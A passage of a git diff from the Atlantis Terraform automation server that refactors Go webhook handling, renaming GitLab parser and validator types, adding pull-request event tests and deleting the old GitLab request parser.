+func runCmd(t *testing.T, dir string, name string, args ...string) string {
+ cpCmd := exec.Command(name, args...)
+ cpCmd.Dir = dir
+ cpOut, err := cpCmd.CombinedOutput()
+ Assert(t, err == nil, "err running %q: %s", strings.Join(append([]string{name}, args...), " "), cpOut)
+ return string(cpOut)
+}
+
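+// assertCommentEquals compares the actual comment act against the expected
+// output in expFile under the repoDir fixture, after normalizing
+// nondeterministic terraform output.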
+func assertCommentEquals(t *testing.T, expFile string, act string, repoDir string) {
+ t.Helper()
+ exp, err := ioutil.ReadFile(filepath.Join(absRepoPath(t, repoDir), expFile))
+ Ok(t, err)
+
+ // Replace all 'Creation complete after 1s (ID: 1111818181)' strings with
+ // 'Creation complete after *s (ID: ******************)' so we can do the comparison.
+ idRegex := regexp.MustCompile(`Creation complete after [0-9]+s \(ID: [0-9]+\)`)
+ act = idRegex.ReplaceAllString(act, "Creation complete after *s (ID: ******************)")
+
+ if string(exp) != act {
+ // If in CI, we write the diff to the console. Otherwise we write the diff
+ // to file so we can use our local diff viewer.
+ if os.Getenv("CI") == "true" {
+ t.Logf("exp: %s, got: %s", string(exp), act)
+ t.FailNow()
+ } else {
+ actFile := filepath.Join(absRepoPath(t, repoDir), expFile+".act")
+ err := ioutil.WriteFile(actFile, []byte(act), 0600)
+ Ok(t, err)
+ cwd, err := os.Getwd()
+ Ok(t, err)
+ rel, err := filepath.Rel(cwd, actFile)
+ Ok(t, err)
+ t.Errorf("%q was different, wrote actual comment to %q", expFile, rel)
+ }
+ }
+}
diff --git a/server/events_controller_test.go b/server/events_controller_test.go
index 7997a56d8a..225021086f 100644
--- a/server/events_controller_test.go
+++ b/server/events_controller_test.go
@@ -16,6 +16,7 @@ package server_test
import (
"bytes"
"errors"
+ "fmt"
"io/ioutil"
"net/http"
"net/http/httptest"
@@ -90,7 +91,7 @@ func TestPost_InvalidGitlabSecret(t *testing.T) {
w := httptest.NewRecorder()
req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil))
req.Header.Set(gitlabHeader, "value")
- When(gl.Validate(req, secret)).ThenReturn(nil, errors.New("err"))
+ When(gl.ParseAndValidate(req, secret)).ThenReturn(nil, errors.New("err"))
e.Post(w, req)
responseContains(t, w, http.StatusBadRequest, "err")
}
@@ -112,7 +113,7 @@ func TestPost_UnsupportedGitlabEvent(t *testing.T) {
w := httptest.NewRecorder()
req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil))
req.Header.Set(gitlabHeader, "value")
- When(gl.Validate(req, secret)).ThenReturn([]byte(`{"not an event": ""}`), nil)
+ When(gl.ParseAndValidate(req, secret)).ThenReturn([]byte(`{"not an event": ""}`), nil)
e.Post(w, req)
responseContains(t, w, http.StatusOK, "Ignoring unsupported event")
}
@@ -148,7 +149,7 @@ func TestPost_GitlabCommentInvalidCommand(t *testing.T) {
e, _, gl, _, _, _, _, cp := setup(t)
req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil))
req.Header.Set(gitlabHeader, "value")
- When(gl.Validate(req, secret)).ThenReturn(gitlab.MergeCommentEvent{}, nil)
+ When(gl.ParseAndValidate(req, secret)).ThenReturn(gitlab.MergeCommentEvent{}, nil)
When(cp.Parse("", models.Gitlab)).ThenReturn(events.CommentParseResult{Ignore: true})
w := httptest.NewRecorder()
e.Post(w, req)
@@ -174,13 +175,13 @@ func TestPost_GitlabCommentNotWhitelisted(t *testing.T) {
RegisterMockTestingT(t)
vcsClient := vcsmocks.NewMockClientProxy()
e := server.EventsController{
- Logger: logging.NewNoopLogger(),
- CommentParser: &events.CommentParser{},
- GitlabRequestParser: &server.DefaultGitlabRequestParser{},
- Parser: &events.EventParser{},
- SupportedVCSHosts: []models.VCSHostType{models.Gitlab},
- RepoWhitelist: &events.RepoWhitelist{},
- VCSClient: vcsClient,
+ Logger: logging.NewNoopLogger(),
+ CommentParser: &events.CommentParser{},
+ GitlabRequestParserValidator: &server.DefaultGitlabRequestParserValidator{},
+ Parser: &events.EventParser{},
+ SupportedVCSHosts: []models.VCSHostType{models.Gitlab},
+ RepoWhitelistChecker: &events.RepoWhitelistChecker{},
+ VCSClient: vcsClient,
}
requestJSON, err := ioutil.ReadFile(filepath.Join("testfixtures", "gitlabMergeCommentEvent_notWhitelisted.json"))
Ok(t, err)
@@ -207,7 +208,7 @@ func TestPost_GithubCommentNotWhitelisted(t *testing.T) {
CommentParser: &events.CommentParser{},
Parser: &events.EventParser{},
SupportedVCSHosts: []models.VCSHostType{models.Github},
- RepoWhitelist: &events.RepoWhitelist{},
+ RepoWhitelistChecker: &events.RepoWhitelistChecker{},
VCSClient: vcsClient,
}
requestJSON, err := ioutil.ReadFile(filepath.Join("testfixtures", "githubIssueCommentEvent_notWhitelisted.json"))
@@ -231,7 +232,7 @@ func TestPost_GitlabCommentResponse(t *testing.T) {
e, _, gl, _, _, _, vcsClient, cp := setup(t)
req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil))
req.Header.Set(gitlabHeader, "value")
- When(gl.Validate(req, secret)).ThenReturn(gitlab.MergeCommentEvent{}, nil)
+ When(gl.ParseAndValidate(req, secret)).ThenReturn(gitlab.MergeCommentEvent{}, nil)
When(cp.Parse("", models.Gitlab)).ThenReturn(events.CommentParseResult{CommentResponse: "a comment"})
w := httptest.NewRecorder()
e.Post(w, req)
@@ -262,14 +263,12 @@ func TestPost_GitlabCommentSuccess(t *testing.T) {
e, _, gl, _, cr, _, _, _ := setup(t)
req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil))
req.Header.Set(gitlabHeader, "value")
- When(gl.Validate(req, secret)).ThenReturn(gitlab.MergeCommentEvent{}, nil)
+ When(gl.ParseAndValidate(req, secret)).ThenReturn(gitlab.MergeCommentEvent{}, nil)
w := httptest.NewRecorder()
e.Post(w, req)
responseContains(t, w, http.StatusOK, "Processing...")
- // wait for 200ms so goroutine is called
- time.Sleep(200 * time.Millisecond)
- cr.VerifyWasCalledOnce().ExecuteCommand(models.Repo{}, models.Repo{}, models.User{}, 0, nil)
+ cr.VerifyWasCalledOnce().RunCommentCommand(models.Repo{}, &models.Repo{}, models.User{}, 0, nil)
}
func TestPost_GithubCommentSuccess(t *testing.T) {
@@ -281,90 +280,105 @@ func TestPost_GithubCommentSuccess(t *testing.T) {
When(v.Validate(req, secret)).ThenReturn([]byte(event), nil)
baseRepo := models.Repo{}
user := models.User{}
- cmd := events.Command{}
+ cmd := events.CommentCommand{}
When(p.ParseGithubIssueCommentEvent(matchers.AnyPtrToGithubIssueCommentEvent())).ThenReturn(baseRepo, user, 1, nil)
When(cp.Parse("", models.Github)).ThenReturn(events.CommentParseResult{Command: &cmd})
w := httptest.NewRecorder()
e.Post(w, req)
responseContains(t, w, http.StatusOK, "Processing...")
- // wait for 200ms so goroutine is called
- time.Sleep(200 * time.Millisecond)
- cr.VerifyWasCalledOnce().ExecuteCommand(baseRepo, baseRepo, user, 1, &cmd)
+ cr.VerifyWasCalledOnce().RunCommentCommand(baseRepo, nil, user, 1, &cmd)
}
-func TestPost_GithubPullRequestNotClosed(t *testing.T) {
- t.Log("when the event is a github pull reuqest but it's not a closed event we ignore it")
- e, v, _, _, _, _, _, _ := setup(t)
+func TestPost_GithubPullRequestInvalid(t *testing.T) {
+ t.Log("when the event is a github pull request with invalid data we return a 400")
+ e, v, _, p, _, _, _, _ := setup(t)
req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil))
req.Header.Set(githubHeader, "pull_request")
- event := `{"action": "opened"}`
+
+ event := `{"action": "closed"}`
When(v.Validate(req, secret)).ThenReturn([]byte(event), nil)
+ When(p.ParseGithubPullEvent(matchers.AnyPtrToGithubPullRequestEvent())).ThenReturn(models.PullRequest{}, models.Repo{}, models.Repo{}, models.User{}, errors.New("err"))
w := httptest.NewRecorder()
e.Post(w, req)
- responseContains(t, w, http.StatusOK, "Ignoring opened pull request event")
+ responseContains(t, w, http.StatusBadRequest, "Error parsing pull data: err")
}
-func TestPost_GitlabMergeRequestNotClosed(t *testing.T) {
- t.Log("when the event is a gitlab merge request but it's not a closed event we ignore it")
+func TestPost_GitlabMergeRequestInvalid(t *testing.T) {
+ t.Log("when the event is a gitlab merge request with invalid data we return a 400")
e, _, gl, p, _, _, _, _ := setup(t)
req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil))
req.Header.Set(gitlabHeader, "value")
- event := gitlab.MergeEvent{}
- When(gl.Validate(req, secret)).ThenReturn(event, nil)
- When(p.ParseGitlabMergeEvent(event)).ThenReturn(models.PullRequest{State: models.Open}, models.Repo{}, nil)
+ When(gl.ParseAndValidate(req, secret)).ThenReturn(gitlabMergeEvent, nil)
+ repo := models.Repo{}
+ pullRequest := models.PullRequest{State: models.Closed}
+ When(p.ParseGitlabMergeEvent(gitlabMergeEvent)).ThenReturn(pullRequest, repo, repo, models.User{}, errors.New("err"))
w := httptest.NewRecorder()
e.Post(w, req)
- responseContains(t, w, http.StatusOK, "Ignoring opened pull request event")
+ responseContains(t, w, http.StatusBadRequest, "Error parsing webhook: err")
}
-func TestPost_GithubPullRequestInvalid(t *testing.T) {
- t.Log("when the event is a github pull request with invalid data we return a 400")
- e, v, _, p, _, _, _, _ := setup(t)
+func TestPost_GithubPullRequestNotWhitelisted(t *testing.T) {
+ t.Log("when the event is a github pull request to a non-whitelisted repo we return a 400")
+ e, v, _, _, _, _, _, _ := setup(t)
+ e.RepoWhitelistChecker = &events.RepoWhitelistChecker{Whitelist: "github.com/nevermatch"}
req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil))
req.Header.Set(githubHeader, "pull_request")
event := `{"action": "closed"}`
When(v.Validate(req, secret)).ThenReturn([]byte(event), nil)
- When(p.ParseGithubPull(matchers.AnyPtrToGithubPullRequest())).ThenReturn(models.PullRequest{}, models.Repo{}, errors.New("err"))
w := httptest.NewRecorder()
e.Post(w, req)
- responseContains(t, w, http.StatusBadRequest, "Error parsing pull data: err")
+ responseContains(t, w, http.StatusForbidden, "Ignoring pull request event from non-whitelisted repo")
}
-func TestPost_GithubPullRequestInvalidRepo(t *testing.T) {
- t.Log("when the event is a github pull request with invalid repo data we return a 400")
- e, v, _, p, _, _, _, _ := setup(t)
+func TestPost_GitlabMergeRequestNotWhitelisted(t *testing.T) {
+ t.Log("when the event is a gitlab merge request to a non-whitelisted repo we return a 400")
+ e, _, gl, p, _, _, _, _ := setup(t)
req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil))
- req.Header.Set(githubHeader, "pull_request")
+ req.Header.Set(gitlabHeader, "value")
+
+ e.RepoWhitelistChecker = &events.RepoWhitelistChecker{Whitelist: "github.com/nevermatch"}
+ When(gl.ParseAndValidate(req, secret)).ThenReturn(gitlabMergeEvent, nil)
+ repo := models.Repo{}
+ pullRequest := models.PullRequest{State: models.Closed}
+ When(p.ParseGitlabMergeEvent(gitlabMergeEvent)).ThenReturn(pullRequest, repo, repo, models.User{}, nil)
- event := `{"action": "closed"}`
- When(v.Validate(req, secret)).ThenReturn([]byte(event), nil)
- When(p.ParseGithubPull(matchers.AnyPtrToGithubPullRequest())).ThenReturn(models.PullRequest{}, models.Repo{}, nil)
- When(p.ParseGithubRepo(matchers.AnyPtrToGithubRepository())).ThenReturn(models.Repo{}, errors.New("err"))
w := httptest.NewRecorder()
e.Post(w, req)
- responseContains(t, w, http.StatusBadRequest, "Error parsing repo data: err")
+ responseContains(t, w, http.StatusForbidden, "Ignoring pull request event from non-whitelisted repo")
}
-func TestPost_GithubPullRequestNotWhitelisted(t *testing.T) {
- t.Log("when the event is a github pull request to a non-whitelisted repo we return a 400")
- e, v, _, p, _, _, _, _ := setup(t)
- e.RepoWhitelist = &events.RepoWhitelist{Whitelist: "github.com/nevermatch"}
+func TestPost_GithubPullRequestUnsupportedAction(t *testing.T) {
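+ t.Log("when the event is a github pull request with an unsupported action we ignore it")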
+ e, v, _, _, _, _, _, _ := setup(t)
req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil))
req.Header.Set(githubHeader, "pull_request")
- event := `{"action": "closed"}`
+ event := `{"action": "unsupported"}`
When(v.Validate(req, secret)).ThenReturn([]byte(event), nil)
- When(p.ParseGithubPull(matchers.AnyPtrToGithubPullRequest())).ThenReturn(models.PullRequest{}, models.Repo{}, nil)
- When(p.ParseGithubRepo(matchers.AnyPtrToGithubRepository())).ThenReturn(models.Repo{}, nil)
w := httptest.NewRecorder()
e.Post(w, req)
- responseContains(t, w, http.StatusForbidden, "Ignoring pull request event from non-whitelisted repo")
+ responseContains(t, w, http.StatusOK, "Ignoring non-actionable pull request event")
}
-func TestPost_GithubPullRequestErrCleaningPull(t *testing.T) {
- t.Log("when the event is a pull request and we have an error calling CleanUpPull we return a 503")
+func TestPost_GitlabMergeRequestUnsupportedAction(t *testing.T) {
+ t.Log("when the event is a gitlab merge request to a non-whitelisted repo we return a 400")
+ e, _, gl, p, _, _, _, _ := setup(t)
+ req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil))
+ req.Header.Set(gitlabHeader, "value")
+ gitlabMergeEvent.ObjectAttributes.Action = "unsupported"
+ When(gl.ParseAndValidate(req, secret)).ThenReturn(gitlabMergeEvent, nil)
+ repo := models.Repo{}
+ pullRequest := models.PullRequest{State: models.Closed}
+ When(p.ParseGitlabMergeEvent(gitlabMergeEvent)).ThenReturn(pullRequest, repo, repo, models.User{}, nil)
+
+ w := httptest.NewRecorder()
+ e.Post(w, req)
+ responseContains(t, w, http.StatusOK, "Ignoring non-actionable pull request event")
+}
+
+func TestPost_GithubPullRequestClosedErrCleaningPull(t *testing.T) {
+ t.Log("when the event is a closed pull request and we have an error calling CleanUpPull we return a 503")
RegisterMockTestingT(t)
e, v, _, p, _, c, _, _ := setup(t)
req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil))
@@ -374,31 +388,30 @@ func TestPost_GithubPullRequestErrCleaningPull(t *testing.T) {
When(v.Validate(req, secret)).ThenReturn([]byte(event), nil)
repo := models.Repo{}
pull := models.PullRequest{State: models.Closed}
- When(p.ParseGithubPull(matchers.AnyPtrToGithubPullRequest())).ThenReturn(pull, repo, nil)
- When(p.ParseGithubRepo(matchers.AnyPtrToGithubRepository())).ThenReturn(repo, nil)
+ When(p.ParseGithubPullEvent(matchers.AnyPtrToGithubPullRequestEvent())).ThenReturn(pull, repo, repo, models.User{}, nil)
When(c.CleanUpPull(repo, pull)).ThenReturn(errors.New("cleanup err"))
w := httptest.NewRecorder()
e.Post(w, req)
responseContains(t, w, http.StatusInternalServerError, "Error cleaning pull request: cleanup err")
}
-func TestPost_GitlabMergeRequestErrCleaningPull(t *testing.T) {
- t.Log("when the event is a gitlab merge request and an error occurs calling CleanUpPull we return a 503")
+func TestPost_GitlabMergeRequestClosedErrCleaningPull(t *testing.T) {
+ t.Log("when the event is a closed gitlab merge request and an error occurs calling CleanUpPull we return a 500")
e, _, gl, p, _, c, _, _ := setup(t)
req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil))
req.Header.Set(gitlabHeader, "value")
- event := gitlab.MergeEvent{}
- When(gl.Validate(req, secret)).ThenReturn(event, nil)
+ gitlabMergeEvent.ObjectAttributes.Action = "close"
+ When(gl.ParseAndValidate(req, secret)).ThenReturn(gitlabMergeEvent, nil)
repo := models.Repo{}
pullRequest := models.PullRequest{State: models.Closed}
- When(p.ParseGitlabMergeEvent(event)).ThenReturn(pullRequest, repo, nil)
+ When(p.ParseGitlabMergeEvent(gitlabMergeEvent)).ThenReturn(pullRequest, repo, repo, models.User{}, nil)
When(c.CleanUpPull(repo, pullRequest)).ThenReturn(errors.New("err"))
w := httptest.NewRecorder()
e.Post(w, req)
responseContains(t, w, http.StatusInternalServerError, "Error cleaning pull request: err")
}
-func TestPost_GithubPullRequestSuccess(t *testing.T) {
+func TestPost_GithubClosedPullRequestSuccess(t *testing.T) {
t.Log("when the event is a pull request and everything works we return a 200")
e, v, _, p, _, c, _, _ := setup(t)
req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil))
@@ -408,8 +421,7 @@ func TestPost_GithubPullRequestSuccess(t *testing.T) {
When(v.Validate(req, secret)).ThenReturn([]byte(event), nil)
repo := models.Repo{}
pull := models.PullRequest{State: models.Closed}
- When(p.ParseGithubPull(matchers.AnyPtrToGithubPullRequest())).ThenReturn(pull, repo, nil)
- When(p.ParseGithubRepo(matchers.AnyPtrToGithubRepository())).ThenReturn(repo, nil)
+ When(p.ParseGithubPullEvent(matchers.AnyPtrToGithubPullRequestEvent())).ThenReturn(pull, repo, repo, models.User{}, nil)
When(c.CleanUpPull(repo, pull)).ThenReturn(nil)
w := httptest.NewRecorder()
e.Post(w, req)
@@ -421,40 +433,153 @@ func TestPost_GitlabMergeRequestSuccess(t *testing.T) {
e, _, gl, p, _, _, _, _ := setup(t)
req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil))
req.Header.Set(gitlabHeader, "value")
- event := gitlab.MergeEvent{}
- When(gl.Validate(req, secret)).ThenReturn(event, nil)
+ When(gl.ParseAndValidate(req, secret)).ThenReturn(gitlabMergeEvent, nil)
repo := models.Repo{}
pullRequest := models.PullRequest{State: models.Closed}
- When(p.ParseGitlabMergeEvent(event)).ThenReturn(pullRequest, repo, nil)
+ When(p.ParseGitlabMergeEvent(gitlabMergeEvent)).ThenReturn(pullRequest, repo, repo, models.User{}, nil)
w := httptest.NewRecorder()
e.Post(w, req)
responseContains(t, w, http.StatusOK, "Pull request cleaned successfully")
}
-func setup(t *testing.T) (server.EventsController, *mocks.MockGithubRequestValidator, *mocks.MockGitlabRequestParser, *emocks.MockEventParsing, *emocks.MockCommandRunner, *emocks.MockPullCleaner, *vcsmocks.MockClientProxy, *emocks.MockCommentParsing) {
+func TestPost_PullOpenedOrUpdated(t *testing.T) {
+ cases := []struct {
+ Description string
+ HostType models.VCSHostType
+ Action string
+ }{
+ {
+ "github opened",
+ models.Github,
+ "opened",
+ },
+ {
+ "gitlab opened",
+ models.Gitlab,
+ "open",
+ },
+ {
+ "github synchronized",
+ models.Github,
+ "synchronize",
+ },
+ {
+ "gitlab update",
+ models.Gitlab,
+ "update",
+ },
+ }
+
+ for _, c := range cases {
+ t.Run(c.Description, func(t *testing.T) {
+ e, v, gl, p, cr, _, _, _ := setup(t)
+ req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil))
+ switch c.HostType {
+ case models.Gitlab:
+ req.Header.Set(gitlabHeader, "value")
+ gitlabMergeEvent.ObjectAttributes.Action = c.Action
+ When(gl.ParseAndValidate(req, secret)).ThenReturn(gitlabMergeEvent, nil)
+ repo := models.Repo{}
+ pullRequest := models.PullRequest{State: models.Closed}
+ When(p.ParseGitlabMergeEvent(gitlabMergeEvent)).ThenReturn(pullRequest, repo, repo, models.User{}, nil)
+ case models.Github:
+ req.Header.Set(githubHeader, "pull_request")
+ event := fmt.Sprintf(`{"action": "%s"}`, c.Action)
+ When(v.Validate(req, secret)).ThenReturn([]byte(event), nil)
+ repo := models.Repo{}
+ pull := models.PullRequest{State: models.Closed}
+ When(p.ParseGithubPullEvent(matchers.AnyPtrToGithubPullRequestEvent())).ThenReturn(pull, repo, repo, models.User{}, nil)
+ }
+ w := httptest.NewRecorder()
+ e.Post(w, req)
+ responseContains(t, w, http.StatusOK, "Processing...")
+ cr.VerifyWasCalledOnce().RunAutoplanCommand(models.Repo{}, models.Repo{}, models.PullRequest{State: models.Closed}, models.User{})
+ })
+ }
+}
+
+func setup(t *testing.T) (server.EventsController, *mocks.MockGithubRequestValidator, *mocks.MockGitlabRequestParserValidator, *emocks.MockEventParsing, *emocks.MockCommandRunner, *emocks.MockPullCleaner, *vcsmocks.MockClientProxy, *emocks.MockCommentParsing) {
RegisterMockTestingT(t)
v := mocks.NewMockGithubRequestValidator()
- gl := mocks.NewMockGitlabRequestParser()
+ gl := mocks.NewMockGitlabRequestParserValidator()
p := emocks.NewMockEventParsing()
cp := emocks.NewMockCommentParsing()
cr := emocks.NewMockCommandRunner()
c := emocks.NewMockPullCleaner()
vcsmock := vcsmocks.NewMockClientProxy()
e := server.EventsController{
- Logger: logging.NewNoopLogger(),
- GithubRequestValidator: v,
- Parser: p,
- CommentParser: cp,
- CommandRunner: cr,
- PullCleaner: c,
- GithubWebHookSecret: secret,
- SupportedVCSHosts: []models.VCSHostType{models.Github, models.Gitlab},
- GitlabWebHookSecret: secret,
- GitlabRequestParser: gl,
- RepoWhitelist: &events.RepoWhitelist{
+ TestingMode: true,
+ Logger: logging.NewNoopLogger(),
+ GithubRequestValidator: v,
+ Parser: p,
+ CommentParser: cp,
+ CommandRunner: cr,
+ PullCleaner: c,
+ GithubWebHookSecret: secret,
+ SupportedVCSHosts: []models.VCSHostType{models.Github, models.Gitlab},
+ GitlabWebHookSecret: secret,
+ GitlabRequestParserValidator: gl,
+ RepoWhitelistChecker: &events.RepoWhitelistChecker{
Whitelist: "*",
},
VCSClient: vcsmock,
}
return e, v, gl, p, cr, c, vcsmock, cp
}
+
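+// gitlabMergeEvent is a GitLab merge request webhook fixture. Its
+// ObjectAttributes.Action defaults to "merge" and is mutated by individual
+// tests to exercise other actions.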
+var gitlabMergeEvent = gitlab.MergeEvent{
+ ObjectAttributes: struct {
+ ID int `json:"id"`
+ TargetBranch string `json:"target_branch"`
+ SourceBranch string `json:"source_branch"`
+ SourceProjectID int `json:"source_project_id"`
+ AuthorID int `json:"author_id"`
+ AssigneeID int `json:"assignee_id"`
+ Title string `json:"title"`
+ CreatedAt string `json:"created_at"`
+ UpdatedAt string `json:"updated_at"`
+ StCommits []*gitlab.Commit `json:"st_commits"`
+ StDiffs []*gitlab.Diff `json:"st_diffs"`
+ MilestoneID int `json:"milestone_id"`
+ State string `json:"state"`
+ MergeStatus string `json:"merge_status"`
+ TargetProjectID int `json:"target_project_id"`
+ IID int `json:"iid"`
+ Description string `json:"description"`
+ Position int `json:"position"`
+ LockedAt string `json:"locked_at"`
+ UpdatedByID int `json:"updated_by_id"`
+ MergeError string `json:"merge_error"`
+ MergeParams struct {
+ ForceRemoveSourceBranch string `json:"force_remove_source_branch"`
+ } `json:"merge_params"`
+ MergeWhenBuildSucceeds bool `json:"merge_when_build_succeeds"`
+ MergeUserID int `json:"merge_user_id"`
+ MergeCommitSha string `json:"merge_commit_sha"`
+ DeletedAt string `json:"deleted_at"`
+ ApprovalsBeforeMerge string `json:"approvals_before_merge"`
+ RebaseCommitSha string `json:"rebase_commit_sha"`
+ InProgressMergeCommitSha string `json:"in_progress_merge_commit_sha"`
+ LockVersion int `json:"lock_version"`
+ TimeEstimate int `json:"time_estimate"`
+ Source *gitlab.Repository `json:"source"`
+ Target *gitlab.Repository `json:"target"`
+ LastCommit struct {
+ ID string `json:"id"`
+ Message string `json:"message"`
+ Timestamp *time.Time `json:"timestamp"`
+ URL string `json:"url"`
+ Author *gitlab.Author `json:"author"`
+ } `json:"last_commit"`
+ WorkInProgress bool `json:"work_in_progress"`
+ URL string `json:"url"`
+ Action string `json:"action"`
+ Assignee struct {
+ Name string `json:"name"`
+ Username string `json:"username"`
+ AvatarURL string `json:"avatar_url"`
+ } `json:"assignee"`
+ }{
+ Action: "merge",
+ },
+}
diff --git a/server/gitlab_request_parser.go b/server/gitlab_request_parser.go
deleted file mode 100644
index 94ab4ddd5a..0000000000
--- a/server/gitlab_request_parser.go
+++ /dev/null
@@ -1,90 +0,0 @@
-// Copyright 2017 HootSuite Media Inc.
-//
-// Licensed under the Apache License, Version 2.0 (the License);
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-// http://www.apache.org/licenses/LICENSE-2.0
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an AS IS BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
-// Modified hereafter by contributors to runatlantis/atlantis.
-//
-package server
-
-import (
- "encoding/json"
- "fmt"
- "io/ioutil"
- "net/http"
-
- "github.com/lkysow/go-gitlab"
-)
-
-const secretHeader = "X-Gitlab-Token" // #nosec
-
-//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_gitlab_request_parser.go GitlabRequestParser
-
-// GitlabRequestParser parses and validates GitLab requests.
-type GitlabRequestParser interface {
- // Validate validates that the request has a token header matching secret.
- // If the secret does not match it returns an error.
- // If secret is empty it does not check the token header.
- // It then parses the request as a GitLab object depending on the header
- // provided by GitLab identifying the webhook type. If the webhook type
- // is not recognized it will return nil but will not return an error.
- // Usage:
- // event, err := GitlabRequestParser.Validate(r, secret)
- // if err != nil {
- // return
- // }
- // switch event := event.(type) {
- // case gitlab.MergeCommentEvent:
- // // handle
- // case gitlab.MergeEvent:
- // // handle
- // default:
- // // unsupported event
- // }
- Validate(r *http.Request, secret []byte) (interface{}, error)
-}
-
-// DefaultGitlabRequestParser parses and validates GitLab requests.
-type DefaultGitlabRequestParser struct{}
-
-// Validate returns the JSON payload of the request.
-// See GitlabRequestParser.Validate()
-func (d *DefaultGitlabRequestParser) Validate(r *http.Request, secret []byte) (interface{}, error) {
- const mergeEventHeader = "Merge Request Hook"
- const noteEventHeader = "Note Hook"
-
- // Validate secret if specified.
- headerSecret := r.Header.Get(secretHeader)
- secretStr := string(secret)
- if len(secret) != 0 && headerSecret != secretStr {
- return nil, fmt.Errorf("header %s=%s did not match expected secret", secretHeader, headerSecret)
- }
-
- // Parse request into a gitlab object based on the object type specified
- // in the gitlabHeader.
- bytes, err := ioutil.ReadAll(r.Body)
- if err != nil {
- return nil, err
- }
- switch r.Header.Get(gitlabHeader) {
- case mergeEventHeader:
- var m gitlab.MergeEvent
- if err := json.Unmarshal(bytes, &m); err != nil {
- return nil, err
- }
- return m, nil
- case noteEventHeader:
- var m gitlab.MergeCommentEvent
- if err := json.Unmarshal(bytes, &m); err != nil {
- return nil, err
- }
- return m, nil
- }
- return nil, nil
-}
diff --git a/server/gitlab_request_parser_test.go b/server/gitlab_request_parser_test.go
deleted file mode 100644
index 385d718795..0000000000
--- a/server/gitlab_request_parser_test.go
+++ /dev/null
@@ -1,386 +0,0 @@
-// Copyright 2017 HootSuite Media Inc.
-//
-// Licensed under the Apache License, Version 2.0 (the License);
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-// http://www.apache.org/licenses/LICENSE-2.0
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an AS IS BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
-// Modified hereafter by contributors to runatlantis/atlantis.
-//
-package server_test
-
-import (
- "bytes"
- "net/http"
- "testing"
-
- "github.com/lkysow/go-gitlab"
- . "github.com/petergtz/pegomock"
- "github.com/runatlantis/atlantis/server"
- . "github.com/runatlantis/atlantis/testing"
-)
-
-var parser = server.DefaultGitlabRequestParser{}
-
-func TestValidate_InvalidSecret(t *testing.T) {
- t.Log("If the secret header is set and doesn't match expected an error is returned")
- RegisterMockTestingT(t)
- buf := bytes.NewBufferString("")
- req, err := http.NewRequest("POST", "http://localhost/event", buf)
- Ok(t, err)
- req.Header.Set("X-Gitlab-Token", "does-not-match")
- _, err = parser.Validate(req, []byte("secret"))
- Assert(t, err != nil, "should be an error")
- Equals(t, "header X-Gitlab-Token=does-not-match did not match expected secret", err.Error())
-}
-
-func TestValidate_ValidSecret(t *testing.T) {
- t.Log("If the secret header matches then the event is returned")
- RegisterMockTestingT(t)
- buf := bytes.NewBufferString(mergeEventJSON)
- req, err := http.NewRequest("POST", "http://localhost/event", buf)
- Ok(t, err)
- req.Header.Set("X-Gitlab-Token", "secret")
- req.Header.Set("X-Gitlab-Event", "Merge Request Hook")
- b, err := parser.Validate(req, []byte("secret"))
- Ok(t, err)
- Equals(t, "Gitlab Test", b.(gitlab.MergeEvent).Project.Name)
-}
-
-func TestValidate_NoSecret(t *testing.T) {
- t.Log("If there is no secret then we ignore the secret header and return the event")
- RegisterMockTestingT(t)
- buf := bytes.NewBufferString(mergeEventJSON)
- req, err := http.NewRequest("POST", "http://localhost/event", buf)
- Ok(t, err)
- req.Header.Set("X-Gitlab-Token", "random secret")
- req.Header.Set("X-Gitlab-Event", "Merge Request Hook")
- b, err := parser.Validate(req, nil)
- Ok(t, err)
- Equals(t, "Gitlab Test", b.(gitlab.MergeEvent).Project.Name)
-}
-
-func TestValidate_InvalidMergeEvent(t *testing.T) {
- t.Log("If the merge event is malformed there should be an error")
- RegisterMockTestingT(t)
- buf := bytes.NewBufferString("{")
- req, err := http.NewRequest("POST", "http://localhost/event", buf)
- Ok(t, err)
- req.Header.Set("X-Gitlab-Event", "Merge Request Hook")
- _, err = parser.Validate(req, nil)
- Assert(t, err != nil, "should be an error")
- Equals(t, "unexpected end of JSON input", err.Error())
-}
-
-func TestValidate_InvalidMergeCommentEvent(t *testing.T) {
- t.Log("If the merge comment event is malformed there should be an error")
- RegisterMockTestingT(t)
- buf := bytes.NewBufferString("{")
- req, err := http.NewRequest("POST", "http://localhost/event", buf)
- Ok(t, err)
- req.Header.Set("X-Gitlab-Event", "Note Hook")
- _, err = parser.Validate(req, nil)
- Assert(t, err != nil, "should be an error")
- Equals(t, "unexpected end of JSON input", err.Error())
-}
-
-func TestValidate_UnrecognizedEvent(t *testing.T) {
- t.Log("If the event is not one we care about we return nil")
- RegisterMockTestingT(t)
- buf := bytes.NewBufferString("")
- req, err := http.NewRequest("POST", "http://localhost/event", buf)
- Ok(t, err)
- req.Header.Set("X-Gitlab-Event", "Random Event")
- event, err := parser.Validate(req, nil)
- Ok(t, err)
- Equals(t, nil, event)
-}
-
-func TestValidate_ValidMergeEvent(t *testing.T) {
- t.Log("If the merge event is valid it should be returned")
- RegisterMockTestingT(t)
